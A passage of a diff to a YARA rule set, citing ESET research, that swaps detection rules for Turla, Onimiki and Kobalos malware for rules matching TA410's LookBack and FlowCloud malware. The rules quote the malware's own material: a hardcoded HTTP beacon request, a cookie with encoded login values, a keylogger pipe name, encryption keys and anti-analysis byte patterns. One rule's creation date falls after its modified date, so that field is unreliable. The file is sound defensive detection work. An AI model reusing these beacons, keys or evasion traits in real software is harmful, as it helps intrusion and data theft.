+            02 F0           //add dh, al
+            0F B6 C6        //movzx eax, dh
+            03 C8           //add ecx, eax
+            0F B6 01        //movzx eax, byte ptr [ecx]
+            88 84 1C 10 01 ?? ??    //mov byte ptr [esp + ebx + 0x110], al
+            43              //inc ebx
+            88 11           //mov byte ptr [ecx], dl
+            81 FB 00 06 00 00       //cmp ebx, 0x600
+            72 ??           //jb 0x10025930
+        }
+		$decrypt = {
+            0F B6 C6        //movzx eax, dh
+            8D 8C 24 10 01 ?? ??    //lea ecx, [esp + 0x110]
+            03 C8           //add ecx, eax
+            8A 19           //mov bl, byte ptr [ecx]
+            8A C3           //mov al, bl
+            02 C6           //add al, dh
+            FE C6           //inc dh
+            02 F8           //add bh, al
+            0F B6 C7        //movzx eax, bh
+            8A 94 04 10 01 ?? ??    //mov dl, byte ptr [esp + eax + 0x110]
+            88 9C 04 10 01 ?? ??    //mov byte ptr [esp + eax + 0x110], bl
+            88 11           //mov byte ptr [ecx], dl
+            0F B6 C2        //movzx eax, dl
+            0F B6 CB        //movzx ecx, bl
+            33 C8           //xor ecx, eax
+            8A 84 0C 10 01 ?? ??    //mov al, byte ptr [esp + ecx + 0x110]
+            30 04 2E        //xor byte ptr [esi + ebp], al
+            46              //inc esi
+            3B F7           //cmp esi, edi
+            7C ??           //jl 0x10025980
         }
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule ESET_Onimiki : LINUX_ONIMIKI
+rule ESET_Apt_Windows_TA410_Lookback_Loader : FILE
 {
 	meta:
-		description = "Linux/Onimiki malicious DNS server"
-		author = "Olivier Bilodeau <bilodeau@eset.com>"
-		id = "3a99799f-fbb4-5fee-a796-3310acd10e17"
-		date = "2014-02-06"
-		modified = "2014-04-04"
+		description = "Matches the modified function in LookBack libcurl loader."
+		author = "ESET Research"
+		id = "d0aac4f6-f72f-5adf-8f8f-9251bad70131"
+		date = "2021-10-12"
+		modified = "2022-04-27"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/windigo/windigo-onimiki.yar#L32-L59"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/ta410/ta410.yar#L256-L309"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "eac30f5c9a9606d1d0e14c55e0532c54976fbb0d2e4f5cd2d9f719b77e07161a"
+		logic_hash = "98390dd664227ad747e5572771d12e7ebd2475d26db27e85508347ac6f44f3bf"
 		score = 75
 		quality = 80
-		tags = "LINUX/ONIMIKI"
-		malware = "Linux/Onimiki"
-		operation = "Windigo"
-		contact = "windigo@eset.sk"
+		tags = "FILE"
 		license = "BSD 2-Clause"
+		version = "1"
 
 	strings:
-		$a1 = {43 0F B6 74 2A 0E 43 0F  B6 0C 2A 8D 7C 3D 00 8D}
-		$a2 = {74 35 00 8D 4C 0D 00 89  F8 41 F7 E3 89 F8 29 D0}
-		$a3 = {D1 E8 01 C2 89 F0 C1 EA  04 44 8D 0C 92 46 8D 0C}
-		$a4 = {8A 41 F7 E3 89 F0 44 29  CF 29 D0 D1 E8 01 C2 89}
-		$a5 = {C8 C1 EA 04 44 8D 04 92  46 8D 04 82 41 F7 E3 89}
-		$a6 = {C8 44 29 C6 29 D0 D1 E8  01 C2 C1 EA 04 8D 04 92}
-		$a7 = {8D 04 82 29 C1 42 0F B6  04 21 42 88 84 14 C0 01}
-		$a8 = {00 00 42 0F B6 04 27 43  88 04 32 42 0F B6 04 26}
-		$a9 = {42 88 84 14 A0 01 00 00  49 83 C2 01 49 83 FA 07}
+		$chunk_1 = {
+            FF 15 ?? ?? ?? ??      //call dword ptr [0x100530e0]
+            6A 40          //push 0x40
+            68 00 10 00 00     //push 0x1000
+            68 F0 04 00 00     //push 0x4f0
+            6A 00          //push 0
+            FF 15 ?? ?? ?? ??      //call dword ptr [0x100530d4]
+            8B E8          //mov ebp, eax
+            B9 3C 01 00 00     //mov ecx, 0x13c
+            BE 60 30 06 10     //mov esi, 0x10063060
+            8B FD          //mov edi, ebp
+            68 F0 04 00 00     //push 0x4f0
+            F3 A5          //rep movsd dword ptr es:[edi], dword ptr [esi]
+            55             //push ebp
+            E8 ?? ?? ?? ??     //call 0x100258d0
+            8B 0D ?? ?? ?? ??      //mov ecx, dword ptr [0x100530e4]
+            A1 ?? ?? ?? ??     //mov eax, dword ptr [0x100530c8]
+            68 6C 02 00 00     //push 0x26c
+            89 4C 24 ??        //mov dword ptr [esp + 0x1c], ecx
+            89 44 24 ??        //mov dword ptr [esp + 0x20], eax
+            FF 15 ?? ?? ?? ??      //call dword ptr [0x10063038]
+            8B D8          //mov ebx, eax
+            B9 9B 00 00 00     //mov ecx, 0x9b
+            BE 50 35 06 10     //mov esi, 0x10063550
+            8B FB          //mov edi, ebx
+            68 6C 02 00 00      //push 0x26c
+            F3 A5          //rep movsd dword ptr es:[edi], dword ptr [esi]
+            53             //push ebx
+            E8 ?? ?? ?? ??     //call 0x100258d0
+            83 C4 14           //add esp, 0x14
+            8D 44 24 ??        //lea eax, [esp + 0x10]
+            50             //push eax
+            53             //push ebx
+            8D 44 24 ??        //lea eax, [esp + 0x3c]
+            50             //push eax
+            A1 ?? ?? ?? ??     //mov eax, dword ptr [0x10063058]
+            FF 74 24 ??        //push dword ptr [esp + 0x28]
+            03 C5          //add eax, ebp
+            FF D0          //call eax
+        }
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule ESET_Turla_Outlook_Gen
+
+rule ESET_Apt_Windows_TA410_Lookback_Strings : FILE
 {
 	meta:
-		description = "Turla Outlook malware"
+		description = "Matches multiple strings and export names in TA410 LookBack."
 		author = "ESET Research"
-		id = "efef2443-c941-54c2-abfa-bbe29c53d930"
-		date = "2018-05-09"
-		modified = "2018-09-05"
+		id = "b693c468-5abf-579d-bc03-67f67339feb9"
+		date = "2021-10-12"
+		modified = "2022-04-27"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/turla/turla-outlook.yar#L42-L74"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/ta410/ta410.yar#L311-L331"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "f709e517e9d957775601670c426cc9def1c4104cb1ff647d269800d2af4372c7"
+		logic_hash = "d17ed604e3691c20fe489f95197b7b802ec951ed13d538fa6643449485b326b2"
 		score = 75
-		quality = 78
-		tags = ""
-		version = 2
-		contact = "github@eset.com"
+		quality = 80
+		tags = "FILE"
 		license = "BSD 2-Clause"
+		version = "1"
 
 	strings:
-		$s1 = "Outlook Express" ascii wide
-		$s2 = "Outlook watchdog" ascii wide
-		$s3 = "Software\\RIT\\The Bat!" ascii wide
-		$s4 = "Mail Event Window" ascii wide
-		$s5 = "Software\\Mozilla\\Mozilla Thunderbird\\Profiles" ascii wide
-		$s6 = "%%PDF-1.4\n%%%c%c\n" ascii wide
-		$s7 = "%Y-%m-%dT%H:%M:%S+0000" ascii wide
-		$s8 = "rctrl_renwnd32" ascii wide
-		$s9 = "NetUIHWND" ascii wide
-		$s10 = "homePostalAddress" ascii wide
-		$s11 = "/EXPORT;OVERRIDE;START=-%d;END=-%d;FOLDER=%s;OUT=" ascii wide
-		$s12 = "Re:|FWD:|AW:|FYI:|NT|QUE:" ascii wide
-		$s13 = "IPM.Note" ascii wide
-		$s14 = "MAPILogonEx" ascii wide
-		$s15 = "pipe\\The Bat! %d CmdLine" ascii wide
-		$s16 = "PowerShellRunner.dll" ascii wide
-		$s17 = "cmd container" ascii wide
-		$s18 = "mapid.tlb" ascii wide nocase
-		$s19 = "Content-Type: F)*+" ascii wide fullword
+		$s1 = "SodomMainFree" ascii wide
+		$s2 = "SodomMainInit" ascii wide
+		$s3 = "SodomNormal.bin" ascii wide
+		$s4 = "SodomHttp.bin" ascii wide
+		$s5 = "sodom.ini" ascii wide
+		$s6 = "SodomMainProc" ascii wide
 
 	condition:
-		ESET_Not_Ms_PRIVATE and 5 of them
+		uint16( 0 ) == 0x5a4d and ( 2 of them or pe.exports ( "SodomBodyLoad" ) or pe.exports ( "SodomBodyLoadTest" ) )
 }
-rule ESET_Turla_Outlook_Filenames
+rule ESET_Apt_Windows_TA410_Lookback_HTTP : FILE
 {
 	meta:
-		description = "Turla Outlook filenames"
+		description = "Matches LookBack's hardcoded HTTP request"
 		author = "ESET Research"
-		id = "3a08003d-50d6-5fdf-9f74-222335ebfa3e"
-		date = "2018-08-22"
-		modified = "2018-09-05"
+		id = "ca4ee437-5ac9-5715-90fb-e0e74a817bb5"
+		date = "2021-10-12"
+		modified = "2022-04-27"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/turla/turla-outlook.yar#L76-L91"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/ta410/ta410.yar#L333-L349"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "3be86c9325de6634c032321beed131fdf1e1952afcb43258fb202d0097610501"
+		logic_hash = "0e777f56136cd11d62abdf4f120410d5fe9cd522cfc06afbf085414a96279bf7"
 		score = 75
 		quality = 80
-		tags = ""
-		contact = "github@eset.com"
+		tags = "FILE"
 		license = "BSD 2-Clause"
+		version = "1"
 
 	strings:
-		$s1 = "mapid.tlb"
-		$s2 = "msmime.dll"
-		$s3 = "scawrdot.db"
+		$s1 = "POST http://%s/status.php?r=%d%d HTTP/1.1\x0d\nAccept: text/html, application/xhtml+xml, */*\x0d\nAccept-Language: en-us\x0d\nUser-Agent: %s\x0d\nContent-Type: application/x-www-form-urlencoded\x0d\nAccept-Encoding: gzip, deflate\x0d\nHost: %s\x0d\nContent-Length: %d\x0d\nConnection: Keep-Alive\x0d\nCache-Control: no-cache\x0d\n\x0d\n" ascii wide
+		$s2 = "id=1&op=report&status="
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule ESET_Turla_Outlook_Log
+rule ESET_Apt_Windows_TA410_Lookback_Magic : FILE
 {
 	meta:
-		description = "First bytes of the encrypted Turla Outlook logs"
+		description = "Matches message header creation in LookBack."
 		author = "ESET Research"
-		id = "b0031c08-8418-5a02-8a2c-daa7236f46f0"
-		date = "2018-08-22"
-		modified = "2018-09-05"
+		id = "5a40a307-772b-5600-9e58-f4bc6dfe6711"
+		date = "2021-10-12"
+		modified = "2022-04-27"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/turla/turla-outlook.yar#L93-L107"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/ta410/ta410.yar#L351-L377"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "e7dc00c33a643c0940aaea2096d099192b27df3c81c518f1dc2b3d45a0a74312"
+		logic_hash = "442a08a77fd2db03e507c0d5a32b17ab4e5936a209f7af23ef3c33a4b9f3d0d5"
 		score = 75
 		quality = 80
-		tags = ""
-		contact = "github@eset.com"
+		tags = "FILE"
 		license = "BSD 2-Clause"
+		version = "1"
 
 	strings:
-		$s1 = {01 87 C9 75 C8 69 98 AC E0 C9 7B [21] EB BB 60 BB 5A}
+		$s1 = {
+            C7 03 C2 2E AB 48           //mov dword ptr [ebx], 0x48ab2ec2
+            ( A1 | 8B 15 ) ?? ?? ?? ??      //mov (eax | edx), x
+            [0-1]               //push ebp
+            89 ?3 04            //mov dword ptr [ebc + 4], reg
+            8B 4? 24 ??             //mov reg, dword ptr [esp + X]
+            89 4? 08            //mov dword ptr [ebx + 8], ??
+            89 ?? 0C            //mov dword ptr [ebx + 0xc], ??
+            8B 4? 24 ??             //mov reg, dword ptr [esp + X]
+            [1-2]               //push 1 or 2 args
+            E8 ?? ?? ?? ??          //call
+        }
 
 	condition:
-		$s1 at 0
+		uint16( 0 ) == 0x5a4d and all of them
 }
+rule ESET_Apt_Windows_TA410_Flowcloud_Loader_Strings : FILE
+{
+	meta:
+		description = "Matches various strings found in TA410 FlowCloud first stage."
+		author = "ESET Research"
+		id = "a3fb894f-8e26-5cbd-a1f2-8a9ab1db0901"
+		date = "2021-10-12"
+		modified = "2022-04-27"
+		reference = "https://github.com/eset/malware-ioc/"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/ta410/ta410.yar#L379-L415"
+		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
+		logic_hash = "3c90723e009ffe2603910566ac52a324256676ee3ff128d94427681010e10e8b"
+		score = 75
+		quality = 78
+		tags = "FILE"
+		license = "BSD 2-Clause"
+		version = "1"
 
-rule ESET_Turla_Outlook_Exports
+	strings:
+		$key = "y983nfdicu3j2dcn09wur9*^&initialize(y4r3inf;'fdskaf'SKF"
+		$s2 = "startModule" fullword
+		$s4 = "auto_start_module" wide
+		$s5 = "load_main_module_after_install" wide
+		$s6 = "terminate_if_fail" wide
+		$s7 = "clear_run_mru" wide
+		$s8 = "install_to_vista" wide
+		$s9 = "load_ext_module" wide
+		$s10 = "sll_only" wide
+		$s11 = "fail_if_already_installed" wide
+		$s12 = "clear_hardware_info" wide
+		$s13 = "av_check" wide fullword
+		$s14 = "check_rs" wide
+		$s15 = "check_360" wide
+		$s16 = "responsor.dat" wide ascii
+		$s17 = "auto_start_after_install_check_anti" wide fullword
+		$s18 = "auto_start_after_install" wide fullword
+		$s19 = "extern_config.dat" wide fullword
+		$s20 = "is_hhw" wide fullword
+		$s21 = "SYSTEM\\Setup\\PrintResponsor" wide
+		$event = "Global\\Event_{201a283f-e52b-450e-bf44-7dc436037e56}" wide ascii
+		$s23 = "invalid encrypto hdr while decrypting"
+
+	condition:
+		uint16( 0 ) == 0x5a4d and ( $key or $event or 5 of ( $s* ) )
+}
+rule ESET_Apt_Windows_TA410_Flowcloud_Header_Decryption : FILE
 {
 	meta:
-		description = "Export names of Turla Outlook Malware"
+		description = "Matches the function used to decrypt resources headers in TA410 FlowCloud"
 		author = "ESET Research"
-		id = "6df4f75e-711a-539d-94bf-9e4e2063ecd4"
-		date = "2018-08-22"
-		modified = "2018-09-05"
+		id = "403c1845-bc25-5a49-8553-8a0be18d6970"
+		date = "2026-01-01"
+		modified = "2022-04-27"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/turla/turla-outlook.yar#L109-L125"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/ta410/ta410.yar#L417-L496"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "a961fdb43ea1e99b308f55b8f5e264b1f3fa817eaf463d512e2ad8b98a18ee99"
+		logic_hash = "74b6c42bf2de159b2b0a15637e6bd94069367e3000c887714d6e3b50aa3646be"
 		score = 75
 		quality = 80
-		tags = ""
-		contact = "github@eset.com"
+		tags = "FILE"
 		license = "BSD 2-Clause"
 
+	strings:
+		$chunk_1 = {
+            8B 1E
+            8B CF
+            D3 CB
+            8D 0C 28
+            83 C7 06
+            30 18
+            8B 1E
+            D3 CB
+            8D 0C 02
+            30 58 ??
+            8B 1E
+            D3 CB
+            8B 4C 24 ??
+            03 C8
+            30 58 ??
+            8B 1E
+            D3 CB
+            8B 4C 24 ??
+            03 C8
+            30 58 ??
+            8B 1E
+            D3 CB
+            8B 4C 24 ??
+            03 C8
+            83 C0 06
+            30 58 ??
+            8B 1E
+            D3 CB
+            30 58 ??
+            83 FF 10
+            72 ??
+        }
+
 	condition:
-		(pe.exports ( "install" ) or pe.exports ( "Install" ) ) and pe.exports ( "TBP_Initialize" ) and pe.exports ( "TBP_Finalize" ) and pe.exports ( "TBP_GetName" ) and pe.exports ( "DllRegisterServer" ) and pe.exports ( "DllGetClassObject" )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule ESET_Generic_Carbon : FILE
+rule ESET_Apt_Windows_TA410_Flowcloud_Dll_Hijacking_Strings : FILE
 {
 	meta:
-		description = "Turla Carbon malware"
+		description = "Matches filenames inside TA410 FlowCloud malicious DLL."
 		author = "ESET Research"
-		id = "efdc0d16-a974-5c00-a401-391d60f3081e"
-		date = "2017-03-30"
-		modified = "2017-03-30"
+		id = "6636d4d0-0a7f-5971-a7f4-58803042d874"
+		date = "2021-10-12"
+		modified = "2022-04-27"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/turla/carbon.yar#L33-L51"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/ta410/ta410.yar#L498-L517"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "6481ccafb7c7c78bc52d01881cb96f3aa6209fdd35e090bdc9d5f5105b4e38ea"
+		logic_hash = "e8082d4216364a12ba395f772b5caed94b3068d26a2b3a97ef711d61a82f65b3"
 		score = 75
 		quality = 80
 		tags = "FILE"
-		contact = "github@eset.com"
 		license = "BSD 2-Clause"
+		version = "1"
 
 	strings:
-		$s1 = "ModStart"
-		$t1 = "STOP|OK"
-		$t2 = "STOP|KILL"
+		$dat1 = "emedres.dat" wide
+		$dat2 = "vviewres.dat" wide
+		$dat3 = "setlangloc.dat" wide
+		$dll1 = "emedres.dll" wide
+		$dll2 = "vviewres.dll" wide
+		$dll3 = "setlangloc.dll" wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d ) and ( 1 of ( $s* ) ) and ( 1 of ( $t* ) )
+		uint16( 0 ) == 0x5a4d and ( all of ( $dat* ) or all of ( $dll* ) )
 }
-
-rule ESET_Carbon_Metadata
+rule ESET_Apt_Windows_TA410_Flowcloud_Malicious_Dll_Antianalysis : FILE
 {
 	meta:
-		description = "Turla Carbon malware"
+		description = "Matches anti-analysis techniques used in TA410 FlowCloud hijacking DLL."
 		author = "ESET Research"
-		id = "976b6a7d-00bf-5d0f-baf9-84fc5dbd21a2"
-		date = "2017-03-30"
-		modified = "2017-03-30"
+		id = "b38a1d4d-5053-5a6d-be8c-c00261936417"
+		date = "2021-10-12"
+		modified = "2022-04-27"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/turla/carbon.yar#L53-L69"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/ta410/ta410.yar#L519-L552"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "81b59e9566f3b3356acf12dadb80abdcbee28e0b1a9efead66fcb95bf6fc1aa5"
+		logic_hash = "8f14352118d32a43c17f70bd753acc48bd314965f10ab97818e8a434bbda96d9"
 		score = 75
 		quality = 80
-		tags = ""
-		contact = "github@eset.com"
+		tags = "FILE"
 		license = "BSD 2-Clause"
+		version = "1"
+
+	strings:
+		$chunk_1 = {
+            33 C0
+            E8 ?? ?? ?? ??
+            83 C0 10
+            3D 00 00 00 80
+            7D 01
+            EB FF
+            E0 50
+            C3
+        }
 
 	condition:
-		(pe.version_info [ "InternalName" ] contains "SERVICE.EXE" or pe.version_info [ "InternalName" ] contains "MSIMGHLP.DLL" or pe.version_info [ "InternalName" ] contains "MSXIML.DLL" ) and pe.version_info [ "CompanyName" ] contains "Microsoft Corporation"
+		uint16( 0 ) == 0x5a4d and all of them
 }
 
-rule ESET_Gazer_Certificate_Subject
+rule ESET_Apt_Windows_TA410_Flowcloud_Pdb : FILE
 {
 	meta:
-		description = "Turla Gazer malware"
+		description = "Matches PDB paths found in TA410 FlowCloud."
 		author = "ESET Research"
-		id = "a7719333-b341-538c-a8ed-5c50b653a765"
-		date = "2017-08-30"
-		modified = "2017-08-29"
+		id = "8bf25768-941e-55c6-bd21-f6b614c9d75d"
+		date = "2021-10-12"
+		modified = "2022-04-27"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/turla/gazer.yar#L33-L46"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/ta410/ta410.yar#L554-L567"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "6e870c9cdcee33769162de62ea143ff401af50b22a63d2f212c44d06f5771dec"
+		logic_hash = "ff95ab0f8e68efe612a6e0d70cebd8bf815d6b5e3877c098ac0761382dc310d6"
 		score = 75
 		quality = 80
-		tags = ""
-		contact = "github@eset.com"
+		tags = "FILE"
 		license = "BSD 2-Clause"
+		version = "1"
 
 	condition:
-		for any i in ( 0 .. pe.number_of_signatures - 1 ) : ( pe.signatures [ i ] . subject contains "Solid Loop" or pe.signatures [ i ] . subject contains "Ultimate Computer Support" )
+		uint16( 0 ) == 0x5a4d and ( pe.pdb_path contains "\\FlowCloud\\trunk\\" or pe.pdb_path contains "\\flowcloud\\trunk\\" )
 }
-rule ESET_Gazer_Certificate : FILE
+rule ESET_Apt_Windows_TA410_Flowcloud_Shellcode_Decryption : FILE
 {
 	meta:
-		description = "Turla Gazer malware"
+		description = "Matches the decryption function used in TA410 FlowCloud self-decrypting DLL"
 		author = "ESET Research"
-		id = "e90bbe53-4e7f-59c4-a505-4893150bf824"
-		date = "2017-08-30"
-		modified = "2017-08-29"
+		id = "8af7b2fa-be40-5ec8-8413-1c982a463a9a"
+		date = "2021-10-12"
+		modified = "2022-04-27"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/turla/gazer.yar#L48-L65"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/ta410/ta410.yar#L569-L615"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "eb3afbaefd23d4fc6ded494d3378dc910a0832b160e733ab79c590128dd74cea"
+		logic_hash = "939ffe6a41c957aa5d6c012484b2deab49a5e71a4b7e203a41c180f872803921"
 		score = 75
 		quality = 80
 		tags = "FILE"
-		contact = "github@eset.com"
 		license = "BSD 2-Clause"
+		version = "1"
 
 	strings:
-		$certif1 = {52 76 a4 53 cd 70 9c 18 da 65 15 7e 5f 1f de 02}
-		$certif2 = {12 90 f2 41 d9 b2 80 af 77 fc da 12 c6 b4 96 9c}
+		$chunk_1 = {
+            33 D2
+            8B 45 ??
+            BB 6B 04 00 00
+            F7 F3
+            81 C2 A8 01 00 00
+            81 E2 FF 00 00 00
+            8B 7D ??
+            33 C9
+            EB ??
+            30 14 39
+            00 14 39
+            41
+            3B 4D ??
+            72 ??
+        }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d ) and 1 of them and filesize < 2MB
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule ESET_Gazer_Logfile_Name : FILE
+rule ESET_Apt_Windows_TA410_Flowcloud_Fcclient_Strings : FILE
 {
 	meta:
-		description = "Turla Gazer malware"
+		description = "Strings found in fcClient/rescure.dat module."
 		author = "ESET Research"
-		id = "3e1454e9-dddf-5197-b486-b96d725fdb58"
-		date = "2017-08-30"
-		modified = "2017-08-29"
+		id = "876bae0b-2612-559b-9ead-b633a3789663"
+		date = "2021-10-12"
+		modified = "2022-04-27"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/turla/gazer.yar#L67-L85"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/ta410/ta410.yar#L617-L639"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "b50553f4b4b07f124e5bd390e7dc8ac6b60a8ef185f3bc227894f957d6483478"
+		logic_hash = "c05b7031a5aec1bcf29eca06c010c402edeb24a093a2043dbc21781dff22c7fe"
 		score = 75
 		quality = 80
 		tags = "FILE"
-		contact = "github@eset.com"
 		license = "BSD 2-Clause"
+		version = "1"
 
 	strings:
-		$s1 = "CVRG72B5.tmp.cvr"
-		$s2 = "CVRG1A6B.tmp.cvr"
-		$s3 = "CVRG38D9.tmp.cvr"
+		$s1 = "df257bdd-847c-490e-9ef9-1d7dc883d3c0"
+		$s2 = "\\{2AFF264E-B722-4359-8E0F-947B85594A9A}"
+		$s3 = "Global\\{26C96B51-2B5D-4D7B-BED1-3DCA4848EDD1}" wide
+		$s4 = "{804423C2-F490-4ac3-BFA5-13DEDE63A71A}" wide
+		$s5 = "{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}" wide
+		$s6 = "XXXModule_func.dll"
+		$driver1 = "\\drivers\\hidmouse.sys" wide fullword
+		$driver2 = "\\drivers\\hidusb.sys" wide fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d ) and 1 of them
+		uint16( 0 ) == 0x5a4d and ( any of ( $s* ) or all of ( $driver* ) )
 }
-rule ESET_Kobalos
+rule ESET_Apt_Windows_TA410_Flowcloud_Fcclientdll_Strings : FILE
 {
 	meta:
-		description = "Kobalos malware"
-		author = "Marc-Etienne M.Léveillé"
-		id = "cdffbe3d-c19d-53a8-9051-48affae00c8a"
-		date = "2020-11-02"
-		modified = "2021-02-01"
+		description = "Strings found in fcClientDll/responsor.dat module."
+		author = "ESET Research"
+		id = "80ecaf51-406f-590c-8f9c-59672683de02"
+		date = "2021-10-12"
+		modified = "2022-04-27"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/kobalos/kobalos.yar#L32-L56"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/ta410/ta410.yar#L641-L669"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "9161d22f9fbb1700dc3121e32104240e34512cb280aaf950aec61513f89061ef"
+		logic_hash = "3a93f58cf14b57a96157077ec14aa6fb181e3da80f4ba46c0379a58b67c08a0e"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		license = "BSD 2-Clause"
 		version = "1"
 
 	strings:
-		$encrypted_strings_sizes = {
-            05 00 00 00 09 00 00 00  04 00 00 00 06 00 00 00
-            08 00 00 00 08 00 00 00  02 00 00 00 02 00 00 00
-            01 00 00 00 01 00 00 00  05 00 00 00 07 00 00 00
-            05 00 00 00 05 00 00 00  05 00 00 00 0A 00 00 00
-        }
-		$password_md5_digest = { 3ADD48192654BD558A4A4CED9C255C4C }
-		$rsa_512_mod_header = { 10 11 02 00 09 02 00 }
-		$strings_rc4_key = { AE0E05090F3AC2B50B1BC6E91D2FE3CE }
+		$s1 = "http://%s/html/portlet/ext/draco/resources/draco_manager.swf/[[DYNAMIC]]/1"
+		$s2 = "Cookie: COOKIE_SUPPORT=true; JSESSIONID=5C7E7A60D01D2891F40648DAB6CB3DF4.jvm1; COMPANY_ID=10301; ID=666e7375545678695645673d; PASSWORD=7a4b48574d746470447a303d; LOGIN=6863303130; SCREEN_NAME=4a2b455377766b657451493d; GUEST_LANGUAGE_ID=en-US"
+		$fc_msg = ".fc_net.msg"
+		$s4 = "\\pipe\\namedpipe_keymousespy_english" wide
+		$s5 = "8932910381748^&*^$58876$%^ghjfgsa413901280dfjslajflsdka&*(^7867=89^&*F(^&*5678f5ds765f76%&*%&*5"
+		$s6 = "cls_{CACB140B-0B82-4340-9B05-7983017BA3A4}" wide
+		$s7 = "HTTP/1.1 200 OK\x0d\nServer: Apache-Coyote/1.1\x0d\nPragma: No-cache\x0d\nCache-Control: no-cache\x0d\nExpires: Thu, 01 Jan 1970 08:00:00 CST\x0d\nLast-Modified: Fri, 27 Apr 2012 08:11:04 GMT\x0d\nContent-Type: application/xml\x0d\nContent-Length: %d\x0d\nDate: %s GMT"
+		$sql1 = "create table if not exists table_filed_space"
+		$sql2 = "create table if not exists clipboard"
+		$sql3 = "create trigger if not exists file_after_delete after delete on file"
+		$sql4 = "create trigger if not exists file_data_after_insert after insert on file_data"
+		$sql5 = "create trigger if not exists file_data_after_delete after delete on file_data"
+		$sql6 = "create trigger if not exists file_data_after_update after update on file_data"
+		$sql7 = "insert into file_data(file_id, ofs, data, status)"
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and ( any of ( $s* ) or #fc_msg >= 8 or 4 of ( $sql* ) )
 }
-rule ESET_Kobalos_Ssh_Credential_Stealer
+rule ESET_Apt_Windows_TA410_Rootkit_Strings : FILE
 {
 	meta:
